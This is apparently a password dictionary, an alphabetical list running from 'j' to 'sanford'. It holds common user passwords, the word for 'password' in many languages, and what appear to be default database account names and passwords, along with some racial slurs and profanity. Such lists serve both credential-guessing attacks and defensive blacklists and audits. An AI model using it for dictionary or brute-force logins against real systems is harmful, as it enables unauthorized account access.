-jjjjjjj
-jjjjjjjj
-jkl123
-jkm
-jl
-jmuser
-joanie
-joanna
-Joanna
-joanne
-jocelyn
-jockey
-jody
-joe
-joe123
-joebob
-joecool
-joejoe
-joel
-joelle
-joemama
-joey
-johan
-johann
-johanna
-johanna1
-johannes
-john
-john123
-john316
-johnboy
-johndeer
-johndoe
-johngalt
-johnjohn
-johnny
-johnny5
-johnson
-Johnson
-johnson1
-jojo
-jojojo
-joker
-joker1
-jokers
-jomama
-jonas
-jonathan
-jonathan1
-jonathon
-jones
-jones1
-jonjon
-jonny
-jordan
-Jordan
-jordan1
-jordan23
-jordie
-jorge
-jorgito
-jose
-josee
-joseph
-joseph1
-josephin
-josh
-joshua
-Joshua
-joshua1
-josie
-journey
-joy
-joyce
-joyjoy
-jsbach
-JSBach
-jtf
-jtm
-jts
-juan
-juanita
-jubilee
-judith
-judy
-juggalo
-juggle
-jughead
-juhani
-juice
-juicy
-jules
-julia
-julia2
-julian
-juliana
-julie
-julie1
-julien
-juliet
-juliette
-julius
-july
-jumanji
-jumbo
-jump
-jumper
-june
-junebug
-jungle
-junior
-junior1
-juniper
-junk
-junkie
-junkmail
-jupiter
-jussi
-just4fun
-just4me
-justdoit
-justice
-justice4
-justin
-justin1
-justinbieb
-justinbieber
-justine
-justme
-justus
-juventus
-k.
-k.:
-kaboom
-kadavucol
-kahlua
-kahuna
-kaiser
-kaitlyn
-kakaxaqwe
-kakka
-kalamazo
-kalameobur
-kali
-kalimatumurur
-kalimatusirr
-kalmarsirri
-kamikaze
-kane
-kang
-kangaroo
-kansas
-karachi
-karate
-karen
-karen1
-karie
-karin
-karina
-karine
-karma
-kashmir
-kasper
-kat
-katalaluan
-katana
-katarina
-katasandi
-kate
-katerina
-katherin
-katherine
-kathleen
-kathrine
-kathryn
-kathy
-katie
-Katie
-katie1
-katina
-katrin
-katrina
-kawasaki
-kayla
-kaylee
-kayleigh
-kcchiefs
-kcin
-kcj9wx5n
-keegan
-keenan
-keeper
-keepout
-keisha
-keith
-keith1
-keller
-kelley
-kellie
-kelly
-kelly1
-kelsey
-kelson
-kelvin
-kendall
-kendra
-keng
-kenken
-kennedy
-kenneth
-kennwort
-kenny
-kenobi
-kenshin
-kent
-kentucky
-kenwood
-kenworth
-kerala
-keri
-kermit
-kernel
-kerouac
-kerri
-kerrie
-kerry
-kerrya
-kerstin
-kestrel
-ketchup
-kevin
-kevin1
-kevinn
-key
-keyboard
-keystone
-keywest
-khan
-kicker
-kidder
-kidrock
-kids
-kieran
-kiki
-kikiki
-kill
-killa
-killbill
-killer
-Killer
-KILLER
-killer1
-killer123
-killers
-killjoy
-killkill
-killme
-kilroy
-kim
-kimball
-kimber
-kimberly
-kimkim
-kimmie
-kinder
-king
-kingdom
-kingfish
-kingkong
-kingpin
-kings
-kingston
-kinky
-kipper
-kirby
-kirill
-kirk
-kirkland
-kirsten
-kirsty
-kiss
-kissa2
-kisses
-kissing
-kisskiss
-kissme
-kitchen
-kiteboy
-kitkat
-kitten
-Kitten
-kittens
-kittie
-kitty
-kitty1
-kittycat
-kittykat
-kittys
-kiwi
-kkkk
-kkkkk
-kkkkkk
-kkkkkkk
-kkkkkkkk
-klaster
-kleenex
-klingon
-klondike
-knickers
-knicks
-knight
-Knight
-knights
-knock
-knockers
-knuckles
-koala
-kobe24
-kodeord
-kodiak
-kodikos
-kojak
-koko
-kokoko
-kokomo
-kombat
-komodo
-kong
-kool
-koolaid
-korn
-kotaku
-kouling
-kramer
-kris
-krishna
-krissy
-krista
-kristen
-kristi
-kristian
-kristie
-kristin
-kristina
-kristine
-kristy
-kronos
-krusty
-krypton
-krystal
-kuai
-kuang
-kume
-kungfu
-kupiasoz
-kupuhipa
-kupukaranga
-kupuuru
-kupuwhakahipa
-kurt
-kwalker
-kyle
-l2ldemo
-lab1
-labrador
-labtec
-lacrosse
-ladder
-laddie
-ladies
-ladle
-lady
-ladybug
-laetitia
-lagnaf
-laguna
-lakers
-lakers1
-lakers24
-lakeside
-lakewood
-lakota
-lala
-lalakers
-lalala
-lalalala
-lambda
-lambert
-lamer
-lamination
-lamont
-lana
-lance
-lancelot
-lancer
-lander
-landon
-lane
-lang
-lansing
-lantern
-laptop
-lara
-larissa
-larkin
-larry
-larry1
-larson
-laser
-laserjet
-laskjdf098ksdaf09
-lassie
-lassie1
-lastfm
-lasvegas
-latin
-latina
-latinas
-latino
-laura
-laura1
-laurel
-lauren
-lauren1
-laurence
-laurent
-laurie
-law
-lawrence
-lawson
-lawyer
-lazarus
-lback
-lbacsys
-leader
-leaf
-leah
-leanne
-leather
-lebesgue
-leblanc
-lebron23
-ledzep
-lee
-leeds
-leedsutd
-leelee
-lefty
-legacy
-legal
-legend
-legion
-legolas
-legos
-leigh
-leinad
-lekker
-leland
-lemans
-lemmein
-lemon
-lemonade
-lemons
-leng
-lennon
-lenny
-leo
-leon
-leonard
-leonardo
-leopard
-leroy
-lesbian
-lesbians
-lesley
-leslie
-lespaul
-lestat
-lester
-letitbe
-letmein
-letmein1
-letmein2
-letsdoit
-letsgo
-letter
-letters
-lev
-lewis
-lexmark
-lexus
-lexus1
-liang
-liao
-libertad
-liberty
-Liberty
-libra
-library
-lick
-licker
-licking
-lickit
-lickme
-life
-lifehack
-lifetime
-light
-lighter
-lighting
-lightnin
-lightning
-lights
-lilbit
-lilian
-lilith
-lillian
-lillie
-lilly
-lima
-limewire
-limited
-lincogo1
-lincoln
-linda
-linda1
-linden
-lindros
-lindsay
-Lindsay
-lindsey
-ling
-link
-linkedin
-linkin
-linkinpark
-links
-lion
-lionel
-lionking
-lions
-lips
-lipstick
-liquid
-lisa
-lisalisa
-lisp
-lissabon
-lister
-lithium
-little
-little1
-live
-liverpoo
-liverpool
-liverpool1
-living
-liz
-lizard
-Lizard
-lizottes
-lizzie
-lizzy
-lkjhgf
-lkjhgfds
-llamas
-llll
-lllll
-llllll
-llllllll
-lloyd
-loaded
-lobo
-lobster
-lock
-lockdown
-lockout
-locks
-loco
-logan
-logan1
-logger
-logical
-login
-Login
-logitech
-logos
-lois
-loislane
-loki
-lol
-lol123
-lola
-lolipop
-lolita
-lollipop
-lollol
-lollypop
-lolo
-lololo
-london
-london1
-lonely
-lonesome
-lonestar
-lonewolf
-long
-longbow
-longdong
-longer
-longhair
-longhorn
-longjohn
-look
-looker
-looking
-lookout
-looney
-loose
-looser
-lopez
-lord
-loren
-lorena
-lorenzo
-loretta
-lori
-lorin
-lorna
-lorraine
-lorrie
-losen
-losenord
-loser
-loser1
-losers
-lost
-lottie
-lotus
-lou
-loud
-louie
-louis
-louise
-loulou
-love
-love1
-love11
-love12
-love123
-love1234
-love13
-love4ever
-love69
-lovebug
-loveit
-lovelife
-lovelove
-lovely
-lovely1
-loveme
-loveme1
-loveme2
-lover
-lover1
-loverboy
-lovers
-lovers1
-lovesex
-loveya
-loveyou
-loveyou1
-loving
-lowell
-lowrider
-lozinka
-luan
-lucas
-lucas1
-lucia
-lucifer
-lucille
-luck
-lucky
-lucky1
-lucky13
-lucky14
-lucky7
-luckydog
-luckyone
-lucy
-ludwig
-luis
-luke
-lulu
-lumber
-lumina
-luna
-lunchbox
-lust
-luther
-lykilord
-lynn
-lynne
-m
-m123456
-m1911a1
-mac
-macaroni
-macbeth
-macdaddy
-macha
-machine
-macintos
-macintosh
-mack
-mackie
-macleod
-macmac
-macman
-macromedia
-macross
-macse30
-madcat
-madcow
-madden
-maddie
-maddog
-madeline
-Madeline
-madison
-madison1
-madmad
-madman
-madmax
-madness
-madoka
-madonna
-madrid
-maestro
-maganda
-magazine
-magelan
-magellan
-maggie
-maggie1
-maggot
-magic
-magic1
-magic32
-magical
-magician
-magick
-magicman
-magnet
-magneto
-magnolia
-magnum
-magnus
-magpie
-magpies
-mahalkita
-mahalko
-mahler
-maiden
-mail
-mailer
-mailman
-maine
-maint
-majestic
-major
-majordomo
-makaveli
-makeitso
-malachi
-malaka
-malcolm
-malcom
-malibu
-malice
-mallard
-mallorca
-mallory
-mallrats
-malone
-mama
-mamacita
-mamapapa
-mamas
-mammoth
-manag3r
-manageme
-manager
-manchest
-manchester
-mancity
-mandarin
-mandingo
-mandrake
-mandy
-mandy1
-manfred
-mang
-manga
-mango
-maniac
-manila
-mankind
-manman
-mann
-manning
-manolito
-manolo
-manowar
-manprod
-manson
-mantis
-mantle
-mantra
-manuel
-manuela
-manutd
-maple
-mar
-mara
-maradona
-marathon
-marble
-marc
-marcel
-marcello
-march
-marci
-marcia
-marcius2
-marco
-marcos
-marcus
-marcy
-margaret
-Margaret
-margarita
-margie
-maria
-maria1
-mariah
-mariah1
-marian
-mariana
-marianne
-marie
-marie1
-marielle
-marietta
-marijuan
-marilyn
-marina
-marine
-marine1
-mariner
-mariners
-marines
-marines1
-marino
-marino13
-mario
-mario1
-marion
-mariposa
-marisa
-marissa
-marius
-marjorie
-mark
-mark1
-marker
-market
-markie
-markus
-marlboro
-marlene
-marley
-marlin
-marlon
-marni
-marquis
-marriage
-married
-mars
-marseille
-marsha
-marshal
-marshall
-mart
-martha
-martin
-martin1
-martina
-martine
-martinez
-martini
-marty
-marvel
-marvin
-mary
-maryann
-maryjane
-maryland
-masamune
-maserati
-mash4077
-mason
-mason1
-massage
-massimo
-massive
-master
-Master
-master1
-master12
-masterbate
-masterbating
-masterp
-masters
-matador
-matchbox
-math
-mathew
-matilda
-matkhau
-matrix
-matrix1
-matt
-matteo
-matthew
-Matthew
-matthew1
-matthews
-matthias
-matti1
-mattie
-mattingly
-matty
-mature
-maureen
-maurice
-maverick
-max
-max123
-maxdog
-maxell
-maxim
-maxima
-maxime
-maximo
-maximum
-maximus
-maxine
-maxmax
-maxwell
-Maxwell
-maxwell1
-maxx
-maxxxx
-mayday
-mayhem
-maynard
-mazda
-mazda1
-mazda6
-mazda626
-mazdarx7
-mcdonald
-mckenzie
-mclaren
-mddata
-mddemo
-mddemo_mgr
-mdsys
-me
-meadow
-meagan
-meat
-meatball
-meathead
-meatloaf
-mech
-mechanic
-media
-medic
-medical
-medicine
-medina
-medusa
-mega
-megadeth
-megaman
-megan
-megan1
-megane
-megaparol12345
-megapass
-megatron
-meggie
-meghan
-meister
-melanie
-melina
-melinda
-melissa
-melissa1
-mellon
-Mellon
-mellow
-melody
-melrose
-melvin
-member
-meme
-mememe
-memorex
-memory
-memphis
-menace
-meng
-mensuck
-mental
-mentor
-meow
-meowmeow
-mephisto
-mercedes
-mercer
-mercury
-merde
-meredith
-meridian
-merlin
-merlin1
-merlot
-Merlot
-mermaid
-merrill
-messenger
-messiah
-met2002
-metal
-metallic
-Metallic
-metallica
-metallica1
-method
-mets
-mexican
-mexico
-mexico1
-mfg
-mgr
-mgwuser
-miami
-miamor
-mian
-miao
-michael
-Michael
-michael1
-michael2
-michaela
-michaels
-michal
-micheal
-michel
-Michel
-Michel1
-michele
-michelle
-Michelle
-michelle1
-michigan
-michou
-mick
-mickel
-mickey
-mickey1
-micro
-micron
-microsof
-microsoft
-middle
-midget
-midnight
-midnight1
-midnite
-midori
-midvale
-midway
-mighty
-migrate
-miguel
-miguelangel
-mikael
-mike
-mike1
-mike123
-mikemike
-mikey
-mikey1
-miki
-milano
-mildred
-miles
-military
-milk
-milkman
-millenium
-miller
-miller1
-millie
-million
-millions
-millwall
-milo
-milton
-mima
-mimi
-mindy
-mine
-minecraft
-minemine
-minerva
-ming
-mingus
-minime
-minimoni
-minimum
-ministry
-minnie
-minou
-minsky
-miracle
-mirage
-miranda
-miriam
-mirror
-mischief
-misery
-misfit
-misfits
-misha
-mishka
-mission
-missouri
-missy
-missy1
-mister
-mistress
-misty
-misty1
-mit
-mitch
-mitchell
-mittens
-mizzou
-mmm
-mmmm
-mmmmm
-mmmmmm
-mmmmmmm
-mmmmmmmm
-mmo2
-mmo3
-mmouse
-mnbvcx
-mnbvcxz
-mobile
-mobydick
-model
-models
-modelsne
-modem
-modena
-modern
-mogul
-moguls
-mohamed
-mohammad
-mohammed
-mohawk
-moikka
-mojo
-mokito
-mollie
-molly
-molly1
-mollydog
-molson
-mom
-mommy
-mommy1
-momo
-momomo
-momoney
-monaco
-monalisa
-monarch
-monday
-Monday
-mondeo
-mone
-monet
-money
-Money
-money1
-money123
-money159
-moneyman
-moneys
-mongola
-mongoose
-monica
-monika
-monique
-monisima
-monitor
-monk
-monkey
-monkey1
-monkey12
-monkeybo
-monkeys
-monopoly
-monroe
-monster
-Monster
-monster1
-monsters
-montag
-montana
-montana3
-monte
-montecar
-montreal
-Montreal
-montrose
-monty
-monty1
-moocow
-mookie
-moomoo
-moon
-moonbeam
-moondog
-mooney
-moonligh
-moonlight
-moonshin
-moore
-moose
-moose1
-mooses
-mopar
-morales
-mordor
-more
-moreau
-morecats
-morenita
-moreno
-morgan
-morgan1
-moritz
-morley
-morning
-moron
-moroni
-morpheus
-morris
-morrison
-mort
-mortal
-mortgage
-mortimer
-morton
-moscow
-moses
-mot de passe
-mot_de_passe
-motdepasse
-mot dordre
-mother
-mother1
-motherfucker
-mothers
-motion
-motley
-motocros
-motor
-motorola
-mountain
-mouse
-mouse1
-mouth
-movie
-movies
-mowgli
-mozart
-mrp
-msc
-msd
-mso
-msr
-mt6ch5
-mtrpw
-mts_password
-mtssys
-mudvayne
-muffin
-mulder
-mulder1
-mullet
-mulligan
-multimedia
-mumblefratz
-munch
-munchkin
-munich
-muppet
-murder
-murphy
-murray
-musashi
-muscle
-muscles
-mushroom
-music
-music1
-musica
-musical
-musicman
-mustafa
-mustang
-mustang1
-mustang6
-mustangs
-mustard
-mutant
-mwa
-mxagent
-mybaby
-mydick
-mygirl
-mykids
-mylife
-mylove
-mynoob
-mypass
-mypassword
-mypc123
-myriam
-myrtle
-myself
-myspace
-myspace1
-myspace123
-myspace2
-mystery
-mystic
-n
-N0=Acc3ss
-nadia
-nadine
-nagel
-naked
-namaste
-names
-nana
-nanacita
-nancy
-nancy1
-nang
-nanook
-naomi
-napalm
-napoleon
-napoli
-napster
-narnia
-naruto
-naruto1
-nasa
-nascar
-nascar24
-nasty
-nasty1
-nastya
-nat
-natalia
-nataliag
-natalie
-natasha
-natasha1
-natation
-nathalie
-nathan
-nathan1
-nation
-national
-native
-natural
-nature
-naub3.
-naughty
-nautica
-navajo
-navy
-navyseal
-nazgul
-ncc1701
-NCC1701
-ncc1701a
-ncc1701d
-ncc1701e
-ncc74656
-ne1410s
-ne1469
-ne14a69
-nebraska
-needles
-negrita
-neil
-neko
-nellie
-nelson
-nemesis
-neng
-nenosiri
-neon
-neotix_sys
-nepenthe
-neptune
-nermal
-nesbit
-nesbitt
-ness
-nestle
-net
-netscape
-netware
-network
-neutrino
-nevada
-never
-nevets
-neville
-new
-newaccount
-newark
-newbie
-newcastl
-newcastle
-newcourt
-newlife
-newman
-newpass
-newpass6
-newport
-news
-newton
-Newton
-newuser
-newyork
-newyork1
-next
-nextel
-nexus6
-nguyen
-niang
-niao
-nicarao
-nicasito
-nice
-niceass
-niceguy
-nicholas
-Nicholas
-nicholas1
-nichole
-nick
-nickel
-nicklaus
-nico
-nicola
-nicolas
-nicole
-nicole1
-nigel
-nigga
-nigger
-nigger1
-night
-nightmar
-nightmare
-nights
-nightshadow
-nightwind
-nike
-niki
-nikita
-nikki
-nikki1
-nimbus
-nimda
-nimrod
-nina
-nine
-nineball
-nineinch
-niners
-ning
-ninja
-ninja1
-ninjas
-nintendo
-nipper
-nipple
-nipples
-nirvana
-nirvana1
-nissan
-nisse
-nita
-nite
-nitram
-nitro
-nittany
-nneulpass
-nnnnnn
-nnnnnnnn
-nobody
-noelle
-nofear
-nokia
-nolimit
-nomad
-nomeacuerdo
-nomore
-noname
-none
-none1
-nonenone
-nong
-nonmember
-nonono
-noodle
-noodles
-nookie
-nopass
-nopassword
-norbert
-noreen
-Noriko
-normal
-norman
-normandy
-norris
-north
-northern
-norton
-norway
-norwich
-nostromo
-notebook
-notes
-nothing
-notta1
-notused
-nounours
-nouveau
-nova
-novell
-november
-noviembre
-noway
-noxious
-nuan
-nuclear
-nude
-nudes
-nudist
-nuevopc
-nugget
-nuggets
-NULL
-number
-number1
-number9
-numbers
-nurse
-nurses
-nutmeg
-nutrition
-nuts
-nutter
-nwo4life
-nygiants
-nyjets
-nylons
-nymets
-nympho
-nyquist
-nywila
-oakland
-oakley
-oasis
-oas_public
-oatmeal
-oaxaca
-obelix
-oberon
-obiwan
-oblivion
-obsession
-obsidian
-ocean
-oceanography
-oceans
-ocelot
-ocitest
-ocm_db_admin
-october
-October
-octopus
-odessa
-odm
-ods
-odscommon
-ods_server
-odyssey
-oe
-oemadm
-oemrep
-oem_temp
-office
-officer
-offshore
-ohshit
-ohyeah
-oicu812
-oilers
-okb
-okc
-oke
-oki
-oklahoma
-oko
-okokok
-okr
-oks
-oksana
-okwuntughe
-okx
-olapdba
-olapsvr
-olapsys
-older
-oldman
-olive
-oliver
-oliver1
-olivetti
-olivia
-olivier
-ollie
-olsen
-olympus
-omega
-omega1
-one
-onelove
-onetime
-onetwo
-onion
-online
-onlyme
-ont
-oo
-oooo
-ooooo
-oooooo
-oooooooo
-open
-opendoor
-opennow
-openspirit
-openup
-opera
-operator
-opi
-optimist
-optimus
-option
-options
-opus
-oracache
-oracl3
-oracle
-oracle8
-oracle8i
-oracle9
-oracle9i
-oradbapass
-orange
-orange1
-oranges
-oraprobe
-oraregsys
-orasso
-orasso_ds
-orasso_pa
-orasso_ps
-orasso_public
-orastat
-orca
-orchard
-orchid
-ordcommon
-ordplugins
-ordsys
-oregon
-oreo
-orgasm
-original
-orioles
-orion
-orion1
-orlando
-oroasina
-oroigbaniwole
-orville
-orwell
-oscar
-oscar1
-osiris
-osm
-osp22
-ota
-otalab
-othello
-otis
-ottawa
-otter
-otto
-ou812
-OU812
-ou8122
-ou8123
-outback
-outkast
-outlaw
-outln
-outside
-over
-overkill
-overlord
-owa
-owa_public
-owf_mgr
-owner
-oxford
-oxygen
-oyster
-ozf
-ozp
-ozs
-ozzy
-p
-pa
-pa55w0rd
-pa55word
-paagal
-pablo
-pacers
-pacific
-pacino
-packard
-packer
-packers
-packers1
-packrat
-pacman
-paco
-pad
-paddle
-padres
-paeseuwodeu
-page
-pain
-painless
-paint
-paintbal
-paintball
-painter
-painting
-pajero
-pakistan
-palace
-paladin
-Paladin
-palavra-passe
-palermo
-pallmall
-palmer
-palmtree
-paloma
-pam
-pamela
-Pamela
-pana
-panama
-panasoni
-panasonic
-pancake
-pancho
-panda
-panda1
-pandas
-pandora
-pang
-panic
-pantera
-pantera1
-panther
-panther1
-panthers
-panties
-pants
-panzer
-papa
-paper
-papers
-papillon
-papito
-paradigm
-paradise
-paradox
-paramedi
-paramo
-paranoid
-paris
-paris1
-parisdenoia
-park
-parker
-parol
-parola
-parolachiave
-paroladordine
-parole
-paroli
-parolja
-parool
-parrot
-partner
-party
-parulle
-pasadena
-pasahitza
-pascal
-pasfhocal
-pasion
-pasowardo
-pass
-pass1
-pass12
-pass123
-pass1234
-passat
-passion
-passme
-passord
-passpass
-passport
-passw0rd
-Passw0rd
-passwd
-passwo1
-passwo2
-passwo3
-passwo4
-passwor
-
-password
-password!
-password.
-Password
-PASSWORD
-password1
-Password1
-password11
-password12
-password123
-password2
-password3
-password9
-passwords
-passwort
-pastor
-pasuwado
-pasvorto
-pasword
-pat
-patch
-patches
-patches1
-pathetic
-pathfind
-patience
-patoclero
-patrice
-patricia
-patrick
-patrick1
-patriot
-patriots
-patrol
-patton
-patty
-paul
-paula
-paulie
-paulina
-pauline
-paulis
-pavel
-pavement
-pavilion
-pavlov
-payday
-payton
-peace
-peace1
-peach
-peaches
-Peaches
-peaches1
-peachy
-peacock
-peanut
-peanut1
-peanuts
-Peanuts
-pearl
-pearljam
-pearls
-pearson
-pebble
-pebbles
-pecker
-pedro
-pedro1
-peekaboo
-peepee
-peeper
-peewee
-pegasus
-peggy
-pekka
-pelican
-pelirroja
-pencil
-pendejo
-penelope
-penetration
-peng
-penguin
-penguin1
-penguins
-penis
-penny
-penny1
-pentagon
-penthous
-pentium
-Pentium
-people
-peoria
-pepe
-pepito
-pepper
-Pepper
-pepper1
-peppers
-pepsi
-pepsi1
-percolate
-percy
-perfect
-perfect1
-performa
-perfstat
-pericles
-perkele
-perkins
-perlita
-perros
-perry
-persimmon
-person
-persona
-personal
-perstat
-pervert
-petalo
-pete
-peter
-Peter
-peter1
-peterbil
-peterk
-peterpan
-peters
-peterson
-petey
-petra
-petunia
-peugeot
-peyton
-phantom
-pharmacy
-phat
-pheonix
-phialpha
-phil
-philip
-philippe
-philips
-phillies
-phillip
-phillips
-philly
-phish
-phishy
-phoebe
-phoenix
-Phoenix
-phoenix1
-phone
-photo
-photos
-photoshop
-phpbb
-phyllis
-physics
-pian
-piano
-piano1
-pianoman
-pianos
-piao
-piazza
-picard
-picasso
-piccolo
-pickle
-pickles
-picks
-pickup
-pics
-picture
-pierce
-piercing
-pierre
-piff
-pigeon
-piggy
-piglet
-Piglet
-pigpen
-pikachu
-pillow
-pilot
-pimp
-pimpdadd
-pimpin
-pimpin1
-pimping
-pinball
-pineappl
-pineapple
-pinetree
-ping
-pingpong
-pinhead
-pink
-pinkfloy
-pinkfloyd
-pinky
-pinky1
-pinnacle
-piolin
-pioneer
-pipeline
-piper
-piper1
-pippen
-pippin
-pippo
-pirate
-pirates
-pisces
-piscis
-pissing
-pissoff
-pistol
-pistons
-pit
-pitbull
-pitch
-pixies
-pizza
-pizza1
-pizzaman
-pizzas
-pjm
-pk3x7w9W
-placebo
-plane
-planes
-planet
-planning
-plasma
-plastic
-plastics
-platinum
-plato
-platypus
-play
-playa
-playball
-playboy
-playboy1
-player
-player1
-players
-playing
-playmate
-playstat
-playstation
-playtime
-please
-pleasure
-plex
-ploppy
-plover
-plumber
-plus
-pluto
-plymouth
-pm
-pmi
-pn
-po
-po7
-po8
-poa
-pocket
-poetic
-poetry
-pogiako
-point
-pointer
-poipoi
-poison
-poiuy
-poiuyt
-pokemon
-pokemon1
-pokemon123
-poker
-poker1
-poland
-polar
-polaris
-pole
-police
-polina
-polish
-politics
-polly
-polo
-polopolo
-polska
-polynomial
-pom
-pomme
-pompey
-poncho
-pondering
-pong
-pontiac
-pony
-poochie
-poodle
-pooh
-poohbear
-poohbear1
-pookey
-pookie
-Pookie
-pookie1
-pool
-pool6123
-poonam
-poontang
-poop
-pooper
-poopie
-poopoo
-pooppoop
-poopy
-pooter
-popcorn
-popcorn1
-pope
-popeye
-popo
-popopo
-popper
-poppop
-poppy
-pork
-porkchop
-porn
-pornking
-porno
-porno1
-pornos
-pornporn
-porque
-porsche
-porsche1
-porsche9
-porsche911
-portal_demo
-portal_sso_ps
-porter
-portland
-portugal
-pos
-poseidon
-positive
-possum
-post
-postal
-poster
-postman
-potato
-pothead
-potter
-powder
-powell
-power
-power1
-powercartuser
-powers
-ppp
-PPP
-pppp
-ppppp
-pppppp
-ppppppp
-pppppppp
-praise
-prayer
-preacher
-precious
-predator
-prelude
-premier
-premium
-presario
-presiden
-president
-presley
-pressure
-presto
-preston
-pretty
-pretty1
-priest
-primary
-primus
-prince
-prince1
-princesa
-princess
-Princess
-princess1
-princeton
-pringles
-print
-printer
-printing
-prissy
-priv
-private
-private1
-privs
-probes
-prodigy
-prof
-professor
-profile
-profit
-program
-progress
-project
-prometheus
-promise
-property
-prophet
-prospect
-prosper
-protect
-protel
-proton
-protozoa
-provider
-prowler
-proxy
-prozac
-psa
-psalms
-psb
-psp
-p@ssw0rd
-psycho
-pub
-public
-pubsub
-pubsub1
-puck
-puddin
-pudding
-puffin
-puffy
-pukayaco14
-pulgas
-pulsar
-pumper
-pumpkin
-pumpkin1
-pumpkins
-punch
-puneet
-punisher
-punk
-punker
-punkin
-punkrock
-puppet
-puppies
-puppy
-puppydog
-purdue
-purple
-Purple
-purple1
-puss
-pussey
-pussie
-pussies
-pussy
-pussy1
-pussy123
-pussy69
-pussycat
-pussyman
-pussys
-putter
-puzzle
-pv
-pw123
-pyramid
-pyro
-python
-q12345
-q123456
-q1w2e3
-q1w2e3r4
-q1w2e3r4t5
-q1w2e3r4t5y6
-qa
-qawsed
-qaz123
-qazqaz
-qazwsx
-qazwsx1
-qazwsx123
-qazwsxed
-qazwsxedc
-qazxsw
-qdba
-qiang
-qiao
-qing
-qiong
-qosqomanta
-qp
-qq123456
-qqq111
-qqqq
-qqqqq
-qqqqqq
-qqqqqqq
-qqqqqqqq
-qqww1122
-qs
-qs_adm
-qs_cb
-qs_cbadm
-qs_cs
-qs_es
-qs_os
-qs_ws
-quality
-quan
-quantum
-quartz
-quasar
-quattro
-quebec
-queen
-queenie
-queens
-quentin
-querty
-quest
-question
-quincy
-qwaszx
-qwe
-qwe123
-qweasd
-qweasd123
-qweasdzxc
-qweewq
-qweqwe
-qwer
-qwer1234
-qwerasdf
-qwerqwer
-qwert
-Qwert
-qwert1
-qwert123
-qwert12345
-qwert40
-qwerty
-Qwerty
-qwerty1
-qwerty12
-qwerty123
-qwerty1234
-qwerty12345
-qwerty123456
-qwerty321
-qwerty7
-qwerty80
-qwertyu
-qwertyui
-qwertyuiop
-qwertz
-qwewq
-qwqwqw
-r0ger
-r2d2c3po
-rabbit
-Rabbit
-rabbit1
-rabbits
-race
-racecar
-racer
-racerx
-rachael
-rachel
-rachel1
-rachelle
-rachmaninoff
-racing
-racoon
-radar
-radical
-radio
-radiohea
-rafael
-rafaeltqm
-rafiki
-rage
-ragnarok
-rahatphan
-raider
-raiders
-Raiders
-raiders1
-railroad
-rain
-rainbow
-rainbow1
-rainbow6
-rainbows
-raindrop
-rainman
-rainyday
-raistlin
-Raistlin
-raleigh
-rallitas
-ralph
-ram
-rambler
-rambo
-rambo1
-ramirez
-ramona
-ramones
-rampage
-ramrod
-ramses
-ramsey
-ramzobur
-ranch
-rancid
-randall
-random
-Random
-randy
-randy1
-rang
-ranger
-ranger1
-rangers
-rangers1
-raphael
-raptor
-rapture
-raquel
-rascal
-rasdzv3
-rasputin
-rasta
-rasta1
-rastafarian
-ratboy
-rated
-ratio
-ratman
-raven
-raven1
-ravens
-raymond
-rayray
-razor
-razz
-re
-reader
-readers
-reading
-ready
-reagan
-real
-reality
-really
-realmadrid
-reaper
-reason
-rebecca
-Rebecca
-rebecca1
-rebel
-rebel1
-rebels
-reckless
-record
-records
-recovery
-red
-red123
-redalert
-redbaron
-redbird
-redbone
-redbull
-redcar
-redcloud
-reddevil
-reddog
-reddwarf
-redeye
-redfish
-redfox
-redhat
-redhead
-redhot
-redline
-redman
-redneck
-redred
-redrose
-redrum
-reds
-redskin
-redskins
-redsox
-redsox1
-redwing
-redwings
-redwood
-reebok
-reed
-reefer
-referee
-reflex
-reggae
-reggie
-regina
-reginald
-regional
-register
-reilly
-rejoice
-reliant
-reload
-remember
-remingto
-remote
-renault
-rene
-renee
-renegade
-reng
-rental
-repadmin
-repair
-replicate
-report
-reports
-rep_owner
-reptile
-republic
-republica
-requiem
-rescue
-research
-reserve
-resident
-respect
-retard
-retire
-retired
-revenge
-review
-revolution
-revolver
-rex
-reynolds
-reznor
-rg
-rghy1234
-rhiannon
-rhino
-rhjrjlbk
-rhonda
-rhx
-ricardo
-ricardo1
-rich
-richard
-richard1
-richards
-richie
-richmond
-rick
-ricky
-rico
-ride
-rider
-riders
-ridge
-right
-rightnow
-riley
-rimmer
-ring
-ringo
-ripken
-ripley
-ripper
-ripple
-risc
-rita
-river
-rivera
-rivers
-rje
-rla
-rlm
-rmail
-rman
-road
-roadkill
-roadking
-roadrunn
-roadrunner
-roadster
-rob
-robbie
-robby
-robert
-Robert
-robert1
-roberta
-roberto
-roberts
-robin
-robin1
-robinhood
-robins
-robinson
-robocop
-robot
-robotech
-robotics
-robyn
-roche
-rochelle
-rochester
-rock
-rocker
-rocket
-rocket1
-rockets
-rockford
-rockhard
-rockie
-rockies
-rockin
-rocknrol
-rocknroll
-rockon
-rocks
-rockstar
-rockstar1
-rockwell
-rocky
-rocky1
-rodent
-rodeo
-rodman
-rodney
-roger
-roger1
-rogers
-rogue
-roland
-rolex
-roll
-roller
-rollin
-rolling
-rollins
-rolltide
-roman
-romance
-romano
-romans
-romantico
-romeo
-romero
-rommel
-ronald
-ronaldo
-rong
-roni
-ronica
-ronnie
-roofer
-rookie
-rooney
-rooster
-root
-root123
-rootbeer
-rootroot
-rosario
-roscoe
-rose
-rosebud
-rosemary
-roses
-rosie
-rosita
-ross
-rossigno
-roswell
-rotten
-rouge
-rough
-route66
-rover
-rovers
-roxanne
-roxy
-roy
-royal
-royals
-royalty
-rr123456rr
-rrrr
-rrrrr
-rrrrrr
-rrrrrrrr
-rrs
-ruan
-rubber
-rubble
-ruben
-ruby
-rudeboy
-rudolf
-rudy
-rufus
-rugby
-rugby1
-rugger
-rules
-rumble
-runaway
-runescape
-runner
-running
-rupert
-rush
-rush2112
-ruslan
-russel
-russell
-Russell
-russia
-russian
-rusty
-rusty1
-rusty2
-ruth
-ruthie
-ruthless
-ryan
-s123456
-sabbath
-sabina
-sabine
-sabres
-sabrina
-sabrina1
-sadie
-sadie1
-safari
-safety
-safety1
-sahara
-saigon
-sailboat
-sailing
-sailor
-saint
-saints
-sairam
-saiyan
-sakura
-sal
-salami
-salasana
-salasona
-saleen
-salem
-sales
-sally
-sally1
-salmon
-salomon
-salope
-salou25
-salut
-salvador
-salvation
-sam
-sam123
-samantha
-samantha1
-sambo
-samiam
-samIam
-samm
-sammie
-sammy
-Sammy
-sammy1
-samoht
-sample
-sampleatm
-sampson
-samsam
-samson
-samsung
-samsung1
-samuel
-samuel22
-samurai
-sanane
-sanchez
-sancho
-sand
-sander
-sanders
-sandi
-sandie
-sandiego
-sandman
-sandra
-sandrine
-sandro
-sandwich
-sandy
-sandy1
-sanford
